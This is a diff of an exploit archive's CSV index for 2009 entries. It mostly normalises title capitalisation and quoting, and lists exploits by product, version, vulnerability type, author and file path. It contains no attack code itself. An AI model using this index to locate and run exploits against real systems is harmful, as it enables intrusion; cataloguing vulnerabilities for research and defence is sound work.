+9048,platforms/php/webapps/9048.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0 9049,platforms/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0 9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps,0 9052,platforms/php/webapps/9052.txt,"BIGACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0 9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0 -9054,platforms/php/webapps/9054.txt,"Wordpress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 +9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Blind SQL Injection",2009-06-30,Dante90,php,webapps,0 9056,platforms/php/webapps/9056.txt,"MDPro Module CWGuestBook 2.1 - SQL Injection",2009-06-30,Dante90,php,webapps,0 9057,platforms/php/webapps/9057.txt,"tsep 0.942.02 - Multiple Vulnerabilities",2009-06-30,eLwaux,php,webapps,0 @@ -8560,22 +8561,22 @@ id,file,description,date,author,platform,type,port 9074,platforms/cgi/webapps/9074.txt,"Sourcefire 3D Sensor & Defense Center 4.8.x - Privilege Escalation",2009-07-02,"Gregory Duchemin",cgi,webapps,0 9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 - (valid_login) Authentication Bypass",2009-07-02,SirGod,php,webapps,0 9076,platforms/php/webapps/9076.php,"Almnzm 2.0 - Blind SQL Injection",2009-07-02,Qabandi,php,webapps,0 -9077,platforms/php/webapps/9077.txt,"conpresso 3.4.8 - (detail.php) Blind SQL Injection",2009-07-02,tmh,php,webapps,0 +9077,platforms/php/webapps/9077.txt,"ConPresso 3.4.8 - 'detail.php' Blind SQL Injection",2009-07-02,tmh,php,webapps,0 9079,platforms/php/webapps/9079.txt,"Opial 1.0 - (Authentication Bypass) SQL Injection",2009-07-02,Moudi,php,webapps,0 -9080,platforms/php/webapps/9080.txt,"Opial 1.0 - (albumid) SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0 +9080,platforms/php/webapps/9080.txt,"Opial 1.0 - 'albumID' SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0 9081,platforms/php/webapps/9081.txt,"Rentventory - Multiple SQL Injections",2009-07-02,Moudi,php,webapps,0 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,linux,local,0 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié ",windows,dos,0 -9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 = COM_CREATE_DB Format String PoC - (Post-Authenticated)",2009-07-09,kingcope,multiple,dos,0 +9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - (Post-Authentication) COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0 9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password Exploit",2009-07-09,rEcruit,php,webapps,0 9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0 9089,platforms/php/webapps/9089.txt,"ClearContent - 'image.php url' Remote File Inclusion / Local File Inclusion",2009-07-09,MizoZ,php,webapps,0 -9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 - (.ofl) Local Heap Overflow (PoC)",2009-07-09,hack4love,windows,dos,0 +9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)",2009-07-09,hack4love,windows,dos,0 9091,platforms/php/webapps/9091.php,"Mlffat 2.2 - Blind SQL Injection",2009-07-09,Qabandi,php,webapps,0 9092,platforms/php/webapps/9092.txt,"webasyst shop-script - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-09,Vrs-hCk,php,webapps,0 -9093,platforms/windows/remote/9093.txt,"windows live messenger plus! fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0 +9093,platforms/windows/remote/9093.txt,"Microsoft Windows live messenger plus! fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0 9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite - 'id' SQL Injection",2009-07-09,BazOka-HaCkEr,php,webapps,0 9095,platforms/php/webapps/9095.txt,"talkback 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0 9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 - JSP Source Viewing",2009-07-09,kingcope,windows,remote,0 @@ -8586,13 +8587,13 @@ id,file,description,date,author,platform,type,port 9101,platforms/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - '.m3u' Local Heap Overflow (PoC)",2009-07-10,Cyber-Zone,windows,dos,0 9103,platforms/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 -9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - (.pdm) Local Buffer Overflow Exploit (SEH)",2009-07-10,His0k4,windows,local,0 +9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow Exploit (SEH)",2009-07-10,His0k4,windows,local,0 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - (Cross-Site Scripting / SQL Injection / Remote Code Execution) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - (login.php user) Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video - ActiveX Remote Buffer Overflow",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 -9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution Exploit",2009-07-10,darkjoker,php,webapps,0 -9110,platforms/php/webapps/9110.txt,"Wordpress Core & Plugins - Privileges Unchecked in admin.php / Multiple Information",2009-07-10,"Core Security",php,webapps,0 +9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0 +9110,platforms/php/webapps/9110.txt,"WordPress Core & Plugins - Privileges Unchecked in admin.php / Multiple Information",2009-07-10,"Core Security",php,webapps,0 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0 9112,platforms/php/webapps/9112.txt,"Joomla Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0 9113,platforms/windows/dos/9113.txt,"OtsAv DJ/TV/Radio - Multiple Local Heap Overflow PoCs",2009-07-10,Stack,windows,dos,0 @@ -8605,11 +8606,11 @@ id,file,description,date,author,platform,type,port 9121,platforms/php/webapps/9121.php,"Morcego CMS 1.7.6 - Blind SQL Injection",2009-07-10,darkjoker,php,webapps,0 9122,platforms/php/webapps/9122.txt,"Opial 1.0 - Arbitrary File Upload / Cross-Site Scripting / SQL Injection",2009-07-11,LMaster,php,webapps,0 9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - '.asx' / '.m3u' / '.m3l' Local Buffer Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0 -9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 - '.m3u '/ '.M3L' / '.TXT' Local Stack Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0 +9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' / '.TXT' Local Stack Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0 9125,platforms/php/webapps/9125.txt,"Ebay Clone 2009 - Multiple SQL Injections",2009-07-11,MizoZ,php,webapps,0 9126,platforms/php/webapps/9126.txt,"Joomla Component com_category - 'catid' SQL Injection",2009-07-11,Prince_Pwn3r,php,webapps,0 9127,platforms/php/webapps/9127.txt,"d.net CMS - Arbitrary Reinstall/Blind SQL Injection",2009-07-11,darkjoker,php,webapps,0 -9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - (response) Remote Buffer Overflow Exploit (SEH)",2009-07-12,His0k4,windows,remote,0 +9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - 'Response' Remote Buffer Overflow Exploit (SEH)",2009-07-12,His0k4,windows,remote,0 9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0 9130,platforms/php/webapps/9130.txt,"PHP AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps,0 9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 - (USER) Remote Buffer Overflow (PoC)",2009-07-13,otokoyama,windows,dos,0 @@ -8622,24 +8623,24 @@ id,file,description,date,author,platform,type,port 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0 9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash Exploit",2009-07-14,prodigy,windows,remote,0 9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,cgi,webapps,0 -9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - (.ICP) Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0 +9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.icp' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0 9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z - '.Mpr' Local Buffer Overflow",2009-07-14,n00b,windows,local,0 9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 - Blind SQL Injection",2009-07-14,Qabandi,php,webapps,0 9146,platforms/windows/local/9146.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow Exploit",2009-07-14,[0]x80->[H]4x²0r,windows,local,0 -9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - (.vib) Local Stack Overflow (PoC)",2009-07-14,hack4love,windows,dos,0 +9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)",2009-07-14,hack4love,windows,dos,0 9148,platforms/windows/local/9148.py,"Live For Speed 2 Version Z - '.mpr' Buffer Overflow (SEH)",2009-07-14,His0k4,windows,local,0 -9149,platforms/windows/local/9149.pl,"Icarus 2.0 - (.ICP) Local Buffer Overflow (SEH)",2009-07-15,hack4love,windows,local,0 -9150,platforms/php/webapps/9150.txt,"Wordpress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0 +9149,platforms/windows/local/9149.pl,"Icarus 2.0 - '.icp' Local Buffer Overflow (SEH)",2009-07-15,hack4love,windows,local,0 +9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0 9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Info Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0 9152,platforms/windows/local/9152.pl,"AudioPLUS 2.00.215 - '.m3u' / '.lst' Universal SEH Overwrite",2009-07-15,Stack,windows,local,0 9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 - (fichier) Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0 9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 - Completely Blind SQL Injection",2009-07-15,petros,php,webapps,0 9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - (DataDirectory) Remote File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0 -9156,platforms/php/webapps/9156.py,"Greenwood Content Manager 0.3.2 - Local File Inclusion Exploit",2009-07-15,"Khashayar Fereidani",php,webapps,0 +9156,platforms/php/webapps/9156.py,"Greenwood Content Manager 0.3.2 - Local File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0 9157,platforms/windows/dos/9157.pl,"Hamster Audio Player 0.3a - Local Buffer Overflow (PoC)",2009-07-15,"ThE g0bL!N",windows,dos,0 -9158,platforms/windows/dos/9158.html,"Mozilla Firefox 3.5 - unicode Remote Buffer Overflow (PoC)",2009-07-15,"Andrew Haynes",windows,dos,0 +9158,platforms/windows/dos/9158.html,"Mozilla Firefox 3.5 - Unicode Remote Buffer Overflow (PoC)",2009-07-15,"Andrew Haynes",windows,dos,0 9159,platforms/php/webapps/9159.php,"Infinity 2.0.5 - Arbitrary Create Admin Exploit",2009-07-15,Qabandi,php,webapps,0 9160,platforms/multiple/dos/9160.txt,"Multiple Web Browsers - Denial of Service",2009-07-15,"Thierry Zoller",multiple,dos,0 9161,platforms/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0 @@ -8657,7 +8658,7 @@ id,file,description,date,author,platform,type,port 9173,platforms/windows/dos/9173.pl,"MultiMedia Jukebox 4.0 Build 020124 - '.pst' / '.m3u' Heap Overflow (PoC)",2009-07-16,hack4love,windows,dos,0 9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - '&x=' Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0 9175,platforms/multiple/dos/9175.txt,"Sguil/PADS - Remote Server Crash",2009-07-17,Ataraxia,multiple,dos,0 -9176,platforms/php/webapps/9176.txt,"dB Masters Multimedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps,0 +9176,platforms/php/webapps/9176.txt,"dB Masters MultiMedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps,0 9177,platforms/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Universal Buffer Overflow Exploit",2009-07-16,Crazy_Hacker,windows,local,0 9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash Exploit",2009-07-16,prodigy,windows,dos,0 9179,platforms/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,php,webapps,0 @@ -8680,9 +8681,9 @@ id,file,description,date,author,platform,type,port 9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0 9199,platforms/windows/local/9199.txt,"Adobe 9.x Related Service - (getPlus_HelperSvc.exe) Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local,0 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0 -9202,platforms/php/webapps/9202.txt,"Silentum GuestBook 2.0.2 - (silentum_guestbook.php) SQL Injection",2009-07-20,Bgh7,php,webapps,0 +9202,platforms/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 - (silentum_Guestbook.php) SQL Injection",2009-07-20,Bgh7,php,webapps,0 9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 - Authentication Bypass",2009-07-20,Mr.tro0oqy,php,webapps,0 -9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 - (LANG) Remote File Inclusion",2009-07-20,NoGe,php,webapps,0 +9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 - 'lang' Remote File Inclusion",2009-07-20,NoGe,php,webapps,0 9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - (SQL Injection / Cross-Site Scripting / shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Privilege Escalation",2009-07-20,anonymous,linux,local,0 @@ -8696,15 +8697,15 @@ id,file,description,date,author,platform,type,port 9216,platforms/windows/local/9216.pl,"Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - (lid) SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0 9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0 -9220,platforms/windows/dos/9220.pl,"KMplayer 2.9.4.1433 - (.srt) Local Buffer Overflow (PoC)",2009-07-20,b3hz4d,windows,dos,0 +9220,platforms/windows/dos/9220.pl,"KMplayer 2.9.4.1433 - '.srt' Local Buffer Overflow (PoC)",2009-07-20,b3hz4d,windows,dos,0 9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - '.lst' Local Buffer Overflow (SEH)",2009-07-21,hack4love,windows,local,0 -9222,platforms/windows/dos/9222.cpp,"FlyHelp - (.CHM) Local Buffer Overflow (PoC)",2009-07-21,"fl0 fl0w",windows,dos,0 +9222,platforms/windows/dos/9222.cpp,"FlyHelp - '.CHM' Local Buffer Overflow (PoC)",2009-07-21,"fl0 fl0w",windows,dos,0 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Privilege Escalation",2009-07-21,"Jeremy Brown",windows,local,0 9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - (Authentication Bypass) SQL Injection",2009-07-21,n3w7u,php,webapps,0 -9226,platforms/php/webapps/9226.txt,"phpdirectorysource - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 +9226,platforms/php/webapps/9226.txt,"phpDirectorySource - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0 -9228,platforms/windows/dos/9228.pl,"otsAV 1.77.001 - (.ofl) Local Heap Overflow (PoC)",2009-07-22,hack4love,windows,dos,0 +9228,platforms/windows/dos/9228.pl,"otsAV 1.77.001 - '.ofl' Local Heap Overflow (PoC)",2009-07-22,hack4love,windows,dos,0 9229,platforms/windows/local/9229.py,"WINMOD 1.4 - '.lst' Universal Buffer Overflow (SEH) (2)",2009-07-22,Dz_Girl,windows,local,0 9231,platforms/php/webapps/9231.txt,"Phorum 5.2.11 - Permanent Cross-Site Scripting",2009-07-22,Crashfr,php,webapps,0 9234,platforms/windows/local/9234.pl,"WINMOD 1.4 - '.lst' Local Stack Overflow",2009-07-23,"CWH Underground",windows,local,0 @@ -8720,10 +8721,10 @@ id,file,description,date,author,platform,type,port 9244,platforms/php/webapps/9244.txt,"Joomla Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 40297,platforms/windows/local/40297.py,"NScan 0.9.1 - (Target) Buffer Overflow",2016-08-29,hyp3rlinx,windows,local,0 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0 -9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0 +9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OS X) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0 9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0 9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - (codigo) SQL Injection",2009-07-24,s4r4d0,php,webapps,0 -9250,platforms/php/webapps/9250.sh,"Wordpress 2.8.1 - (url) Cross-Site Scripting Exploit",2009-07-24,superfreakaz0rz,php,webapps,0 +9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting Exploit",2009-07-24,superfreakaz0rz,php,webapps,0 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection",2009-07-24,Coksnuss,php,webapps,0 9253,platforms/windows/dos/9253.html,"Microsoft Internet Explorer 7/8 - findText Unicode Parsing Crash Exploit",2009-07-24,Hong10,windows,dos,0 @@ -8732,7 +8733,7 @@ id,file,description,date,author,platform,type,port 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure Exploit",2009-07-24,Qabandi,php,webapps,0 9258,platforms/php/webapps/9258.txt,"Joomla Almond Classifieds 7.5 - (com_aclassf) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9259,platforms/php/webapps/9259.txt,"almond classifieds ads - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 +9259,platforms/php/webapps/9259.txt,"almond Classifieds ads - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9260,platforms/php/webapps/9260.txt,"skadate dating - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9261,platforms/php/webapps/9261.txt,"XOOPS celepar module qas - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 @@ -8740,7 +8741,7 @@ id,file,description,date,author,platform,type,port 9264,platforms/linux/dos/9264.py,"stftp 1.10 - (PWD Response) Remote Stack Overflow (PoC)",2009-07-27,sqlevil,linux,dos,0 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow (PoC)",2009-07-27,"Jon Oberheide",linux,dos,0 9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0 -9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 - (Cat_ID) SQL Injection (patched?)",2009-07-27,octopos,php,webapps,0 +9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 - 'Cat_ID' SQL Injection",2009-07-27,octopos,php,webapps,0 9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 - Basic Auth Remote Denial of Service (Metasploit)",2009-07-27,"Christoph Bott",hardware,dos,0 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script - 'home.php' Remote File Inclusion",2009-07-27,int_main();,php,webapps,0 9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection",2009-07-27,MizoZ,php,webapps,0 @@ -8760,17 +8761,17 @@ id,file,description,date,author,platform,type,port 9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusion",2009-07-27,GoLd_M,php,webapps,0 9286,platforms/windows/local/9286.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (SEH)",2009-07-28,corelanc0d3r,windows,local,0 9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0 -9288,platforms/php/webapps/9288.txt,"PHPArcadeScript 4.0 - (linkout.php id) SQL Injection",2009-07-28,MizoZ,php,webapps,0 +9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - (linkout.php id) SQL Injection",2009-07-28,MizoZ,php,webapps,0 9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod 2.0.4 - Blind SQL Injection",2009-07-28,Dante90,php,webapps,0 -9290,platforms/php/webapps/9290.txt,"In-Portal 4.3.1 - Arbitrary File Upload",2009-07-28,Mr.tro0oqy,php,webapps,0 -9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - (.mpf) Local Buffer Overflow Exploit (SEH)",2009-07-28,Koshi,windows,local,0 +9290,platforms/php/webapps/9290.txt,"In-portal 4.3.1 - Arbitrary File Upload",2009-07-28,Mr.tro0oqy,php,webapps,0 +9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - '.mpf' Local Buffer Overflow Exploit (SEH)",2009-07-28,Koshi,windows,local,0 9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 -9293,platforms/php/webapps/9293.txt,"PaoBacheca GuestBook 2.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 +9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 9295,platforms/windows/dos/9295.txt,"Firebird SQL - op_connect_request main listener shutdown",2009-07-28,"Core Security",windows,dos,0 9296,platforms/php/webapps/9296.txt,"TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities",2009-07-28,"Aung Khant",php,webapps,0 9297,platforms/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion",2009-07-28,NoGe,php,webapps,0 -9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - (.mpf) Local Stack Overflow (update)",2009-07-30,corelanc0d3r,windows,local,0 +9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (update)",2009-07-30,corelanc0d3r,windows,local,0 9299,platforms/windows/local/9299.pl,"WINMOD 1.4 - '.lst' Local Stack Overflow XP SP3 (RET + SEH) (3)",2009-07-28,corelanc0d3r,windows,local,0 9300,platforms/multiple/dos/9300.c,"ISC BIND 9 - Remote Dynamic Update Message Denial of Service (PoC)",2009-07-30,kingcope,multiple,dos,0 9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - 'win32k.sys' Privilege Escalation",2009-07-30,"NT Internals",windows,local,0 @@ -8787,16 +8788,16 @@ id,file,description,date,author,platform,type,port 9312,platforms/php/webapps/9312.txt,"d.net CMS - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a - (pagecontent.php PT) Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion",2009-07-30,SirGod,php,webapps,0 -9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion Exploit",2009-07-30,Dante90,php,webapps,0 +9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,php,webapps,0 9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) SQL Injection",2009-07-30,NoGe,php,webapps,0 -9317,platforms/windows/dos/9317.c,"Google SketchUp Pro 7.0 - (.skp) Remote Stack Overflow (PoC)",2009-08-01,LiquidWorm,windows,dos,0 +9317,platforms/windows/dos/9317.c,"Google SketchUp Pro 7.0 - '.skp' Remote Stack Overflow (PoC)",2009-08-01,LiquidWorm,windows,dos,0 9318,platforms/windows/remote/9318.py,"VLC Media Player 0.8.6f - smb:// URI Handling Remote Buffer Overflow Exploit (Universal)",2009-07-31,His0k4,windows,remote,0 9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager - Remote Buffer Overflow Exploit",2009-08-01,Bruk0ut,windows,remote,30000 9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - 